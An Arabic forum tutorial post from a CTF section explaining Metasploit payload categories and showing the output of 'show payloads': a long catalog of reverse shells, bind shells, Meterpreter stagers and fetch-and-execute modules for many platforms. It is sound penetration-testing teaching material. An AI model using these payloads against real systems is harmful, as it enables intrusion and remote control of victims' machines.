مضى على الشبكة و يوم من العطاء.

الدرس الخامس : مكتبة Payload

3b0-0d3b0-0d is verified member.

{ || مشرف قسم CTF || }
.:: طاقم المشرفين ::.

السمعة:

تحتوي هذه المكتبة على أكواد أو سكريبتات تم تصميمها للتحكم في الأنظمة أو الأجهزة المستهدفة بعد استغلالها. يمكن استخدام هذه الأكواد لتنفيذ أوامر على الأنظمة الضحية بما في ذلك تثبيت برامج ضارة أو تقديم أوامر عن بعد.
1700515819386.png
الاسمالوصف
adaptersوحدات التكييف (Adapters) تُستخدم لتعديل وتكييف شحنات (Payloads) لضبطها وفقًا للسياق المحدد أو الأنظمة المستهدفة.
singlesوحدات الشحنات الفردية (Single Payloads) يُمكن استخدامها كشحنات مستقلة دون الحاجة إلى وظائف إضافية.
stagersوحدات الـ Stagers تُستخدم لتحميل وتنفيذ الشحنات الثانوية (Stages) على الأنظمة المستهدفة.
stagesوحدات الـ Stages تُستخدم كجزء من العمليات التي تقوم بتحميل وتنفيذ الشحنات على الأنظمة المستهدفة.
اكتب الامر التالي لأظهار كل المكاتب show payloads
كود:
msf6 > show payloads

Payloads
========

   #     Name                                                                       Disclosure Date  Rank    Check  Description
   -     ----                                                                       ---------------  ----    -----  -----------
   0     payload/aix/ppc/shell_bind_tcp                                                              normal  No     AIX Command Shell, Bind TCP Inline
   1     payload/aix/ppc/shell_find_port                                                             normal  No     AIX Command Shell, Find Port Inline
   2     payload/aix/ppc/shell_interact                                                              normal  No     AIX execve Shell for inetd
   3     payload/aix/ppc/shell_reverse_tcp                                                           normal  No     AIX Command Shell, Reverse TCP Inline
   4     payload/android/meterpreter/reverse_http                                                    normal  No     Android Meterpreter, Android Reverse HTTP Stager
   5     payload/android/meterpreter/reverse_https                                                   normal  No     Android Meterpreter, Android Reverse HTTPS Stager
   6     payload/android/meterpreter/reverse_tcp                                                     normal  No     Android Meterpreter, Android Reverse TCP Stager
   7     payload/android/meterpreter_reverse_http                                                    normal  No     Android Meterpreter Shell, Reverse HTTP Inline
   8     payload/android/meterpreter_reverse_https                                                   normal  No     Android Meterpreter Shell, Reverse HTTPS Inline
   9     payload/android/meterpreter_reverse_tcp                                                     normal  No     Android Meterpreter Shell, Reverse TCP Inline
   10    payload/android/shell/reverse_http                                                          normal  No     Command Shell, Android Reverse HTTP Stager
   11    payload/android/shell/reverse_https                                                         normal  No     Command Shell, Android Reverse HTTPS Stager
   12    payload/android/shell/reverse_tcp                                                           normal  No     Command Shell, Android Reverse TCP Stager
   13    payload/apple_ios/aarch64/meterpreter_reverse_http                                          normal  No     Apple_iOS Meterpreter, Reverse HTTP Inline
   14    payload/apple_ios/aarch64/meterpreter_reverse_https                                         normal  No     Apple_iOS Meterpreter, Reverse HTTPS Inline
   15    payload/apple_ios/aarch64/meterpreter_reverse_tcp                                           normal  No     Apple_iOS Meterpreter, Reverse TCP Inline
   16    payload/apple_ios/aarch64/shell_reverse_tcp                                                 normal  No     Apple iOS aarch64 Command Shell, Reverse TCP Inline
   17    payload/apple_ios/armle/meterpreter_reverse_http                                            normal  No     Apple_iOS Meterpreter, Reverse HTTP Inline
   18    payload/apple_ios/armle/meterpreter_reverse_https                                           normal  No     Apple_iOS Meterpreter, Reverse HTTPS Inline
   19    payload/apple_ios/armle/meterpreter_reverse_tcp                                             normal  No     Apple_iOS Meterpreter, Reverse TCP Inline
   20    payload/bsd/sparc/shell_bind_tcp                                                            normal  No     BSD Command Shell, Bind TCP Inline
   21    payload/bsd/sparc/shell_reverse_tcp                                                         normal  No     BSD Command Shell, Reverse TCP Inline
   22    payload/bsd/vax/shell_reverse_tcp                                                           normal  No     BSD Command Shell, Reverse TCP Inline
   23    payload/bsd/x64/exec                                                                        normal  No     BSD x64 Execute Command
   24    payload/bsd/x64/shell_bind_ipv6_tcp                                                         normal  No     BSD x64 Command Shell, Bind TCP Inline (IPv6)
   25    payload/bsd/x64/shell_bind_tcp                                                              normal  No     BSD x64 Shell Bind TCP
   26    payload/bsd/x64/shell_bind_tcp_small                                                        normal  No     BSD x64 Command Shell, Bind TCP Inline
   27    payload/bsd/x64/shell_reverse_ipv6_tcp                                                      normal  No     BSD x64 Command Shell, Reverse TCP Inline (IPv6)
   28    payload/bsd/x64/shell_reverse_tcp                                                           normal  No     BSD x64 Shell Reverse TCP
   29    payload/bsd/x64/shell_reverse_tcp_small                                                     normal  No     BSD x64 Command Shell, Reverse TCP Inline
   30    payload/bsd/x86/exec                                                                        normal  No     BSD Execute Command
   31    payload/bsd/x86/metsvc_bind_tcp                                                             normal  No     FreeBSD Meterpreter Service, Bind TCP
   32    payload/bsd/x86/metsvc_reverse_tcp                                                          normal  No     FreeBSD Meterpreter Service, Reverse TCP Inline
   33    payload/bsd/x86/shell/bind_ipv6_tcp                                                         normal  No     BSD Command Shell, Bind TCP Stager (IPv6)
   34    payload/bsd/x86/shell/bind_tcp                                                              normal  No     BSD Command Shell, Bind TCP Stager
   35    payload/bsd/x86/shell/find_tag                                                              normal  No     BSD Command Shell, Find Tag Stager
   36    payload/bsd/x86/shell/reverse_ipv6_tcp                                                      normal  No     BSD Command Shell, Reverse TCP Stager (IPv6)
   37    payload/bsd/x86/shell/reverse_tcp                                                           normal  No     BSD Command Shell, Reverse TCP Stager
   38    payload/bsd/x86/shell_bind_tcp                                                              normal  No     BSD Command Shell, Bind TCP Inline
   39    payload/bsd/x86/shell_bind_tcp_ipv6                                                         normal  No     BSD Command Shell, Bind TCP Inline (IPv6)
   40    payload/bsd/x86/shell_find_port                                                             normal  No     BSD Command Shell, Find Port Inline
   41    payload/bsd/x86/shell_find_tag                                                              normal  No     BSD Command Shell, Find Tag Inline
   42    payload/bsd/x86/shell_reverse_tcp                                                           normal  No     BSD Command Shell, Reverse TCP Inline
   43    payload/bsd/x86/shell_reverse_tcp_ipv6                                                      normal  No     BSD Command Shell, Reverse TCP Inline (IPv6)
   44    payload/bsdi/x86/shell/bind_tcp                                                             normal  No     BSDi Command Shell, Bind TCP Stager
   45    payload/bsdi/x86/shell/reverse_tcp                                                          normal  No     BSDi Command Shell, Reverse TCP Stager
   46    payload/bsdi/x86/shell_bind_tcp                                                             normal  No     BSDi Command Shell, Bind TCP Inline
   47    payload/bsdi/x86/shell_find_port                                                            normal  No     BSDi Command Shell, Find Port Inline
   48    payload/bsdi/x86/shell_reverse_tcp                                                          normal  No     BSDi Command Shell, Reverse TCP Inline
   49    payload/cmd/linux/http/mips64/meterpreter_reverse_http                                      normal  No     HTTP Fetch
   50    payload/cmd/linux/http/mips64/meterpreter_reverse_https                                     normal  No     HTTP Fetch
   51    payload/cmd/linux/http/mips64/meterpreter_reverse_tcp                                       normal  No     HTTP Fetch
   52    payload/cmd/linux/http/x64/exec                                                             normal  No     HTTP Fetch, Linux Execute Command
   53    payload/cmd/linux/http/x64/meterpreter/bind_tcp                                             normal  No     HTTP Fetch, Bind TCP Stager
   54    payload/cmd/linux/http/x64/meterpreter/reverse_sctp                                         normal  No     HTTP Fetch, Reverse SCTP Stager
   55    payload/cmd/linux/http/x64/meterpreter/reverse_tcp                                          normal  No     HTTP Fetch, Reverse TCP Stager
   56    payload/cmd/linux/http/x64/meterpreter_reverse_http                                         normal  No     HTTP Fetch
   57    payload/cmd/linux/http/x64/meterpreter_reverse_https                                        normal  No     HTTP Fetch
   58    payload/cmd/linux/http/x64/meterpreter_reverse_tcp                                          normal  No     HTTP Fetch
   59    payload/cmd/linux/http/x64/pingback_bind_tcp                                                normal  No     HTTP Fetch, Linux x64 Pingback, Bind TCP Inline
   60    payload/cmd/linux/http/x64/pingback_reverse_tcp                                             normal  No     HTTP Fetch, Linux x64 Pingback, Reverse TCP Inline
   61    payload/cmd/linux/http/x64/shell/bind_tcp                                                   normal  No     HTTP Fetch, Linux Command Shell, Bind TCP Stager
   62    payload/cmd/linux/http/x64/shell/reverse_sctp                                               normal  No     HTTP Fetch, Linux Command Shell, Reverse SCTP Stager
   63    payload/cmd/linux/http/x64/shell/reverse_tcp                                                normal  No     HTTP Fetch, Linux Command Shell, Reverse TCP Stager
   64    payload/cmd/linux/http/x64/shell_bind_ipv6_tcp                                              normal  No     HTTP Fetch, Linux x64 Command Shell, Bind TCP Inline (IPv6)
   65    payload/cmd/linux/http/x64/shell_bind_tcp                                                   normal  No     HTTP Fetch, Linux Command Shell, Bind TCP Inline
   66    payload/cmd/linux/http/x64/shell_bind_tcp_random_port                                       normal  No     HTTP Fetch, Linux Command Shell, Bind TCP Random Port Inline
   67    payload/cmd/linux/http/x64/shell_find_port                                                  normal  No     HTTP Fetch, Linux Command Shell, Find Port Inline
   68    payload/cmd/linux/http/x64/shell_reverse_ipv6_tcp                                           normal  No     HTTP Fetch, Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   69    payload/cmd/linux/http/x64/shell_reverse_tcp                                                normal  No     HTTP Fetch, Linux Command Shell, Reverse TCP Inline
   70    payload/cmd/linux/http/x86/adduser                                                          normal  No     HTTP Fetch, Linux Add User
   71    payload/cmd/linux/http/x86/chmod                                                            normal  No     HTTP Fetch, Linux Chmod
   72    payload/cmd/linux/http/x86/exec                                                             normal  No     HTTP Fetch, Linux Execute Command
   73    payload/cmd/linux/http/x86/generic/debug_trap                                               normal  No     HTTP Fetch, Generic x86 Debug Trap
   74    payload/cmd/linux/http/x86/generic/tight_loop                                               normal  No     HTTP Fetch, Generic x86 Tight Loop
   75    payload/cmd/linux/http/x86/meterpreter/bind_ipv6_tcp                                        normal  No     HTTP Fetch, Bind IPv6 TCP Stager (Linux x86)
   76    payload/cmd/linux/http/x86/meterpreter/bind_ipv6_tcp_uuid                                   normal  No     HTTP Fetch, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   77    payload/cmd/linux/http/x86/meterpreter/bind_nonx_tcp                                        normal  No     HTTP Fetch, Bind TCP Stager
   78    payload/cmd/linux/http/x86/meterpreter/bind_tcp                                             normal  No     HTTP Fetch, Bind TCP Stager (Linux x86)
   79    payload/cmd/linux/http/x86/meterpreter/bind_tcp_uuid                                        normal  No     HTTP Fetch, Bind TCP Stager with UUID Support (Linux x86)
   80    payload/cmd/linux/http/x86/meterpreter/find_tag                                             normal  No     HTTP Fetch, Find Tag Stager
   81    payload/cmd/linux/http/x86/meterpreter/reverse_ipv6_tcp                                     normal  No     HTTP Fetch, Reverse TCP Stager (IPv6)
   82    payload/cmd/linux/http/x86/meterpreter/reverse_nonx_tcp                                     normal  No     HTTP Fetch, Reverse TCP Stager
   83    payload/cmd/linux/http/x86/meterpreter/reverse_tcp                                          normal  No     HTTP Fetch, Reverse TCP Stager
   84    payload/cmd/linux/http/x86/meterpreter/reverse_tcp_uuid                                     normal  No     HTTP Fetch, Reverse TCP Stager
   85    payload/cmd/linux/http/x86/meterpreter_reverse_http                                         normal  No     HTTP Fetch
   86    payload/cmd/linux/http/x86/meterpreter_reverse_https                                        normal  No     HTTP Fetch
   87    payload/cmd/linux/http/x86/meterpreter_reverse_tcp                                          normal  No     HTTP Fetch
   88    payload/cmd/linux/http/x86/metsvc_bind_tcp                                                  normal  No     HTTP Fetch, Linux Meterpreter Service, Bind TCP
   89    payload/cmd/linux/http/x86/metsvc_reverse_tcp                                               normal  No     HTTP Fetch, Linux Meterpreter Service, Reverse TCP Inline
   90    payload/cmd/linux/http/x86/read_file                                                        normal  No     HTTP Fetch, Linux Read File
   91    payload/cmd/linux/http/x86/shell/bind_ipv6_tcp                                              normal  No     HTTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   92    payload/cmd/linux/http/x86/shell/bind_ipv6_tcp_uuid                                         normal  No     HTTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   93    payload/cmd/linux/http/x86/shell/bind_nonx_tcp                                              normal  No     HTTP Fetch, Linux Command Shell, Bind TCP Stager
   94    payload/cmd/linux/http/x86/shell/bind_tcp                                                   normal  No     HTTP Fetch, Linux Command Shell, Bind TCP Stager (Linux x86)
   95    payload/cmd/linux/http/x86/shell/bind_tcp_uuid                                              normal  No     HTTP Fetch, Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   96    payload/cmd/linux/http/x86/shell/find_tag                                                   normal  No     HTTP Fetch, Linux Command Shell, Find Tag Stager
   97    payload/cmd/linux/http/x86/shell/reverse_ipv6_tcp                                           normal  No     HTTP Fetch, Linux Command Shell, Reverse TCP Stager (IPv6)
   98    payload/cmd/linux/http/x86/shell/reverse_nonx_tcp                                           normal  No     HTTP Fetch, Linux Command Shell, Reverse TCP Stager
   99    payload/cmd/linux/http/x86/shell/reverse_tcp                                                normal  No     HTTP Fetch, Linux Command Shell, Reverse TCP Stager
   100   payload/cmd/linux/http/x86/shell/reverse_tcp_uuid                                           normal  No     HTTP Fetch, Linux Command Shell, Reverse TCP Stager
   101   payload/cmd/linux/http/x86/shell_bind_ipv6_tcp                                              normal  No     HTTP Fetch, Linux Command Shell, Bind TCP Inline (IPv6)
   102   payload/cmd/linux/http/x86/shell_bind_tcp                                                   normal  No     HTTP Fetch, Linux Command Shell, Bind TCP Inline
   103   payload/cmd/linux/http/x86/shell_bind_tcp_random_port                                       normal  No     HTTP Fetch, Linux Command Shell, Bind TCP Random Port Inline
   104   payload/cmd/linux/http/x86/shell_find_port                                                  normal  No     HTTP Fetch, Linux Command Shell, Find Port Inline
   105   payload/cmd/linux/http/x86/shell_find_tag                                                   normal  No     HTTP Fetch, Linux Command Shell, Find Tag Inline
   106   payload/cmd/linux/http/x86/shell_reverse_tcp                                                normal  No     HTTP Fetch, Linux Command Shell, Reverse TCP Inline
   107   payload/cmd/linux/http/x86/shell_reverse_tcp_ipv6                                           normal  No     HTTP Fetch, Linux Command Shell, Reverse TCP Inline (IPv6)
   108   payload/cmd/linux/https/mips64/meterpreter_reverse_http                                     normal  No     HTTPS Fetch
   109   payload/cmd/linux/https/mips64/meterpreter_reverse_https                                    normal  No     HTTPS Fetch
   110   payload/cmd/linux/https/mips64/meterpreter_reverse_tcp                                      normal  No     HTTPS Fetch
   111   payload/cmd/linux/https/x64/exec                                                            normal  No     HTTPS Fetch, Linux Execute Command
   112   payload/cmd/linux/https/x64/meterpreter/bind_tcp                                            normal  No     HTTPS Fetch, Bind TCP Stager
   113   payload/cmd/linux/https/x64/meterpreter/reverse_sctp                                        normal  No     HTTPS Fetch, Reverse SCTP Stager
   114   payload/cmd/linux/https/x64/meterpreter/reverse_tcp                                         normal  No     HTTPS Fetch, Reverse TCP Stager
   115   payload/cmd/linux/https/x64/meterpreter_reverse_http                                        normal  No     HTTPS Fetch
   116   payload/cmd/linux/https/x64/meterpreter_reverse_https                                       normal  No     HTTPS Fetch
   117   payload/cmd/linux/https/x64/meterpreter_reverse_tcp                                         normal  No     HTTPS Fetch
   118   payload/cmd/linux/https/x64/pingback_bind_tcp                                               normal  No     HTTPS Fetch, Linux x64 Pingback, Bind TCP Inline
   119   payload/cmd/linux/https/x64/pingback_reverse_tcp                                            normal  No     HTTPS Fetch, Linux x64 Pingback, Reverse TCP Inline
   120   payload/cmd/linux/https/x64/shell/bind_tcp                                                  normal  No     HTTPS Fetch, Linux Command Shell, Bind TCP Stager
   121   payload/cmd/linux/https/x64/shell/reverse_sctp                                              normal  No     HTTPS Fetch, Linux Command Shell, Reverse SCTP Stager
   122   payload/cmd/linux/https/x64/shell/reverse_tcp                                               normal  No     HTTPS Fetch, Linux Command Shell, Reverse TCP Stager
   123   payload/cmd/linux/https/x64/shell_bind_ipv6_tcp                                             normal  No     HTTPS Fetch, Linux x64 Command Shell, Bind TCP Inline (IPv6)
   124   payload/cmd/linux/https/x64/shell_bind_tcp                                                  normal  No     HTTPS Fetch, Linux Command Shell, Bind TCP Inline
   125   payload/cmd/linux/https/x64/shell_bind_tcp_random_port                                      normal  No     HTTPS Fetch, Linux Command Shell, Bind TCP Random Port Inline
   126   payload/cmd/linux/https/x64/shell_find_port                                                 normal  No     HTTPS Fetch, Linux Command Shell, Find Port Inline
   127   payload/cmd/linux/https/x64/shell_reverse_ipv6_tcp                                          normal  No     HTTPS Fetch, Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   128   payload/cmd/linux/https/x64/shell_reverse_tcp                                               normal  No     HTTPS Fetch, Linux Command Shell, Reverse TCP Inline
   129   payload/cmd/linux/https/x86/adduser                                                         normal  No     HTTPS Fetch, Linux Add User
   130   payload/cmd/linux/https/x86/chmod                                                           normal  No     HTTPS Fetch, Linux Chmod
   131   payload/cmd/linux/https/x86/exec                                                            normal  No     HTTPS Fetch, Linux Execute Command
   132   payload/cmd/linux/https/x86/generic/debug_trap                                              normal  No     HTTPS Fetch, Generic x86 Debug Trap
   133   payload/cmd/linux/https/x86/generic/tight_loop                                              normal  No     HTTPS Fetch, Generic x86 Tight Loop
   134   payload/cmd/linux/https/x86/meterpreter/bind_ipv6_tcp                                       normal  No     HTTPS Fetch, Bind IPv6 TCP Stager (Linux x86)
   135   payload/cmd/linux/https/x86/meterpreter/bind_ipv6_tcp_uuid                                  normal  No     HTTPS Fetch, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   136   payload/cmd/linux/https/x86/meterpreter/bind_nonx_tcp                                       normal  No     HTTPS Fetch, Bind TCP Stager
   137   payload/cmd/linux/https/x86/meterpreter/bind_tcp                                            normal  No     HTTPS Fetch, Bind TCP Stager (Linux x86)
   138   payload/cmd/linux/https/x86/meterpreter/bind_tcp_uuid                                       normal  No     HTTPS Fetch, Bind TCP Stager with UUID Support (Linux x86)
   139   payload/cmd/linux/https/x86/meterpreter/find_tag                                            normal  No     HTTPS Fetch, Find Tag Stager
   140   payload/cmd/linux/https/x86/meterpreter/reverse_ipv6_tcp                                    normal  No     HTTPS Fetch, Reverse TCP Stager (IPv6)
   141   payload/cmd/linux/https/x86/meterpreter/reverse_nonx_tcp                                    normal  No     HTTPS Fetch, Reverse TCP Stager
   142   payload/cmd/linux/https/x86/meterpreter/reverse_tcp                                         normal  No     HTTPS Fetch, Reverse TCP Stager
   143   payload/cmd/linux/https/x86/meterpreter/reverse_tcp_uuid                                    normal  No     HTTPS Fetch, Reverse TCP Stager
   144   payload/cmd/linux/https/x86/meterpreter_reverse_http                                        normal  No     HTTPS Fetch
   145   payload/cmd/linux/https/x86/meterpreter_reverse_https                                       normal  No     HTTPS Fetch
   146   payload/cmd/linux/https/x86/meterpreter_reverse_tcp                                         normal  No     HTTPS Fetch
   147   payload/cmd/linux/https/x86/metsvc_bind_tcp                                                 normal  No     HTTPS Fetch, Linux Meterpreter Service, Bind TCP
   148   payload/cmd/linux/https/x86/metsvc_reverse_tcp                                              normal  No     HTTPS Fetch, Linux Meterpreter Service, Reverse TCP Inline
   149   payload/cmd/linux/https/x86/read_file                                                       normal  No     HTTPS Fetch, Linux Read File
   150   payload/cmd/linux/https/x86/shell/bind_ipv6_tcp                                             normal  No     HTTPS Fetch, Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   151   payload/cmd/linux/https/x86/shell/bind_ipv6_tcp_uuid                                        normal  No     HTTPS Fetch, Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   152   payload/cmd/linux/https/x86/shell/bind_nonx_tcp                                             normal  No     HTTPS Fetch, Linux Command Shell, Bind TCP Stager
   153   payload/cmd/linux/https/x86/shell/bind_tcp                                                  normal  No     HTTPS Fetch, Linux Command Shell, Bind TCP Stager (Linux x86)
   154   payload/cmd/linux/https/x86/shell/bind_tcp_uuid                                             normal  No     HTTPS Fetch, Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   155   payload/cmd/linux/https/x86/shell/find_tag                                                  normal  No     HTTPS Fetch, Linux Command Shell, Find Tag Stager
   156   payload/cmd/linux/https/x86/shell/reverse_ipv6_tcp                                          normal  No     HTTPS Fetch, Linux Command Shell, Reverse TCP Stager (IPv6)
   157   payload/cmd/linux/https/x86/shell/reverse_nonx_tcp                                          normal  No     HTTPS Fetch, Linux Command Shell, Reverse TCP Stager
   158   payload/cmd/linux/https/x86/shell/reverse_tcp                                               normal  No     HTTPS Fetch, Linux Command Shell, Reverse TCP Stager
   159   payload/cmd/linux/https/x86/shell/reverse_tcp_uuid                                          normal  No     HTTPS Fetch, Linux Command Shell, Reverse TCP Stager
   160   payload/cmd/linux/https/x86/shell_bind_ipv6_tcp                                             normal  No     HTTPS Fetch, Linux Command Shell, Bind TCP Inline (IPv6)
   161   payload/cmd/linux/https/x86/shell_bind_tcp                                                  normal  No     HTTPS Fetch, Linux Command Shell, Bind TCP Inline
   162   payload/cmd/linux/https/x86/shell_bind_tcp_random_port                                      normal  No     HTTPS Fetch, Linux Command Shell, Bind TCP Random Port Inline
   163   payload/cmd/linux/https/x86/shell_find_port                                                 normal  No     HTTPS Fetch, Linux Command Shell, Find Port Inline
   164   payload/cmd/linux/https/x86/shell_find_tag                                                  normal  No     HTTPS Fetch, Linux Command Shell, Find Tag Inline
   165   payload/cmd/linux/https/x86/shell_reverse_tcp                                               normal  No     HTTPS Fetch, Linux Command Shell, Reverse TCP Inline
   166   payload/cmd/linux/https/x86/shell_reverse_tcp_ipv6                                          normal  No     HTTPS Fetch, Linux Command Shell, Reverse TCP Inline (IPv6)
   167   payload/cmd/linux/tftp/mips64/meterpreter_reverse_http                                      normal  No     TFTP Fetch
   168   payload/cmd/linux/tftp/mips64/meterpreter_reverse_https                                     normal  No     TFTP Fetch
   169   payload/cmd/linux/tftp/mips64/meterpreter_reverse_tcp                                       normal  No     TFTP Fetch
   170   payload/cmd/linux/tftp/x64/exec                                                             normal  No     TFTP Fetch, Linux Execute Command
   171   payload/cmd/linux/tftp/x64/meterpreter/bind_tcp                                             normal  No     TFTP Fetch, Bind TCP Stager
   172   payload/cmd/linux/tftp/x64/meterpreter/reverse_sctp                                         normal  No     TFTP Fetch, Reverse SCTP Stager
   173   payload/cmd/linux/tftp/x64/meterpreter/reverse_tcp                                          normal  No     TFTP Fetch, Reverse TCP Stager
   174   payload/cmd/linux/tftp/x64/meterpreter_reverse_http                                         normal  No     TFTP Fetch
   175   payload/cmd/linux/tftp/x64/meterpreter_reverse_https                                        normal  No     TFTP Fetch
   176   payload/cmd/linux/tftp/x64/meterpreter_reverse_tcp                                          normal  No     TFTP Fetch
   177   payload/cmd/linux/tftp/x64/pingback_bind_tcp                                                normal  No     TFTP Fetch, Linux x64 Pingback, Bind TCP Inline
   178   payload/cmd/linux/tftp/x64/pingback_reverse_tcp                                             normal  No     TFTP Fetch, Linux x64 Pingback, Reverse TCP Inline
   179   payload/cmd/linux/tftp/x64/shell/bind_tcp                                                   normal  No     TFTP Fetch, Linux Command Shell, Bind TCP Stager
   180   payload/cmd/linux/tftp/x64/shell/reverse_sctp                                               normal  No     TFTP Fetch, Linux Command Shell, Reverse SCTP Stager
   181   payload/cmd/linux/tftp/x64/shell/reverse_tcp                                                normal  No     TFTP Fetch, Linux Command Shell, Reverse TCP Stager
   182   payload/cmd/linux/tftp/x64/shell_bind_ipv6_tcp                                              normal  No     TFTP Fetch, Linux x64 Command Shell, Bind TCP Inline (IPv6)
   183   payload/cmd/linux/tftp/x64/shell_bind_tcp                                                   normal  No     TFTP Fetch, Linux Command Shell, Bind TCP Inline
   184   payload/cmd/linux/tftp/x64/shell_bind_tcp_random_port                                       normal  No     TFTP Fetch, Linux Command Shell, Bind TCP Random Port Inline
   185   payload/cmd/linux/tftp/x64/shell_find_port                                                  normal  No     TFTP Fetch, Linux Command Shell, Find Port Inline
   186   payload/cmd/linux/tftp/x64/shell_reverse_ipv6_tcp                                           normal  No     TFTP Fetch, Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   187   payload/cmd/linux/tftp/x64/shell_reverse_tcp                                                normal  No     TFTP Fetch, Linux Command Shell, Reverse TCP Inline
   188   payload/cmd/linux/tftp/x86/adduser                                                          normal  No     TFTP Fetch, Linux Add User
   189   payload/cmd/linux/tftp/x86/chmod                                                            normal  No     TFTP Fetch, Linux Chmod
   190   payload/cmd/linux/tftp/x86/exec                                                             normal  No     TFTP Fetch, Linux Execute Command
   191   payload/cmd/linux/tftp/x86/generic/debug_trap                                               normal  No     TFTP Fetch, Generic x86 Debug Trap
   192   payload/cmd/linux/tftp/x86/generic/tight_loop                                               normal  No     TFTP Fetch, Generic x86 Tight Loop
   193   payload/cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp                                        normal  No     TFTP Fetch, Bind IPv6 TCP Stager (Linux x86)
   194   payload/cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp_uuid                                   normal  No     TFTP Fetch, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   195   payload/cmd/linux/tftp/x86/meterpreter/bind_nonx_tcp                                        normal  No     TFTP Fetch, Bind TCP Stager
   196   payload/cmd/linux/tftp/x86/meterpreter/bind_tcp                                             normal  No     TFTP Fetch, Bind TCP Stager (Linux x86)
   197   payload/cmd/linux/tftp/x86/meterpreter/bind_tcp_uuid                                        normal  No     TFTP Fetch, Bind TCP Stager with UUID Support (Linux x86)
   198   payload/cmd/linux/tftp/x86/meterpreter/find_tag                                             normal  No     TFTP Fetch, Find Tag Stager
   199   payload/cmd/linux/tftp/x86/meterpreter/reverse_ipv6_tcp                                     normal  No     TFTP Fetch, Reverse TCP Stager (IPv6)
   200   payload/cmd/linux/tftp/x86/meterpreter/reverse_nonx_tcp                                     normal  No     TFTP Fetch, Reverse TCP Stager
   201   payload/cmd/linux/tftp/x86/meterpreter/reverse_tcp                                          normal  No     TFTP Fetch, Reverse TCP Stager
   202   payload/cmd/linux/tftp/x86/meterpreter/reverse_tcp_uuid                                     normal  No     TFTP Fetch, Reverse TCP Stager
   203   payload/cmd/linux/tftp/x86/meterpreter_reverse_http                                         normal  No     TFTP Fetch
   204   payload/cmd/linux/tftp/x86/meterpreter_reverse_https                                        normal  No     TFTP Fetch
   205   payload/cmd/linux/tftp/x86/meterpreter_reverse_tcp                                          normal  No     TFTP Fetch
   206   payload/cmd/linux/tftp/x86/metsvc_bind_tcp                                                  normal  No     TFTP Fetch, Linux Meterpreter Service, Bind TCP
   207   payload/cmd/linux/tftp/x86/metsvc_reverse_tcp                                               normal  No     TFTP Fetch, Linux Meterpreter Service, Reverse TCP Inline
   208   payload/cmd/linux/tftp/x86/read_file                                                        normal  No     TFTP Fetch, Linux Read File
   209   payload/cmd/linux/tftp/x86/shell/bind_ipv6_tcp                                              normal  No     TFTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   210   payload/cmd/linux/tftp/x86/shell/bind_ipv6_tcp_uuid                                         normal  No     TFTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   211   payload/cmd/linux/tftp/x86/shell/bind_nonx_tcp                                              normal  No     TFTP Fetch, Linux Command Shell, Bind TCP Stager
   212   payload/cmd/linux/tftp/x86/shell/bind_tcp                                                   normal  No     TFTP Fetch, Linux Command Shell, Bind TCP Stager (Linux x86)
   213   payload/cmd/linux/tftp/x86/shell/bind_tcp_uuid                                              normal  No     TFTP Fetch, Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   214   payload/cmd/linux/tftp/x86/shell/find_tag                                                   normal  No     TFTP Fetch, Linux Command Shell, Find Tag Stager
   215   payload/cmd/linux/tftp/x86/shell/reverse_ipv6_tcp                                           normal  No     TFTP Fetch, Linux Command Shell, Reverse TCP Stager (IPv6)
   216   payload/cmd/linux/tftp/x86/shell/reverse_nonx_tcp                                           normal  No     TFTP Fetch, Linux Command Shell, Reverse TCP Stager
   217   payload/cmd/linux/tftp/x86/shell/reverse_tcp                                                normal  No     TFTP Fetch, Linux Command Shell, Reverse TCP Stager
   218   payload/cmd/linux/tftp/x86/shell/reverse_tcp_uuid                                           normal  No     TFTP Fetch, Linux Command Shell, Reverse TCP Stager
   219   payload/cmd/linux/tftp/x86/shell_bind_ipv6_tcp                                              normal  No     TFTP Fetch, Linux Command Shell, Bind TCP Inline (IPv6)
   220   payload/cmd/linux/tftp/x86/shell_bind_tcp                                                   normal  No     TFTP Fetch, Linux Command Shell, Bind TCP Inline
   221   payload/cmd/linux/tftp/x86/shell_bind_tcp_random_port                                       normal  No     TFTP Fetch, Linux Command Shell, Bind TCP Random Port Inline
   222   payload/cmd/linux/tftp/x86/shell_find_port                                                  normal  No     TFTP Fetch, Linux Command Shell, Find Port Inline
   223   payload/cmd/linux/tftp/x86/shell_find_tag                                                   normal  No     TFTP Fetch, Linux Command Shell, Find Tag Inline
   224   payload/cmd/linux/tftp/x86/shell_reverse_tcp                                                normal  No     TFTP Fetch, Linux Command Shell, Reverse TCP Inline
   225   payload/cmd/linux/tftp/x86/shell_reverse_tcp_ipv6                                           normal  No     TFTP Fetch, Linux Command Shell, Reverse TCP Inline (IPv6)
   226   payload/cmd/mainframe/apf_privesc_jcl                                                       normal  No     JCL to Escalate Privileges
   227   payload/cmd/mainframe/bind_shell_jcl                                                        normal  No     Z/OS (MVS) Command Shell, Bind TCP
   228   payload/cmd/mainframe/generic_jcl                                                           normal  No     Generic JCL Test for Mainframe Exploits
   229   payload/cmd/mainframe/reverse_shell_jcl                                                     normal  No     Z/OS (MVS) Command Shell, Reverse TCP
   230   payload/cmd/unix/adduser                                                                    normal  No     Add user with useradd
   231   payload/cmd/unix/bind_awk                                                                   normal  No     Unix Command Shell, Bind TCP (via AWK)
   232   payload/cmd/unix/bind_busybox_telnetd                                                       normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   233   payload/cmd/unix/bind_inetd                                                                 normal  No     Unix Command Shell, Bind TCP (inetd)
   234   payload/cmd/unix/bind_jjs                                                                   normal  No     Unix Command Shell, Bind TCP (via jjs)
   235   payload/cmd/unix/bind_lua                                                                   normal  No     Unix Command Shell, Bind TCP (via Lua)
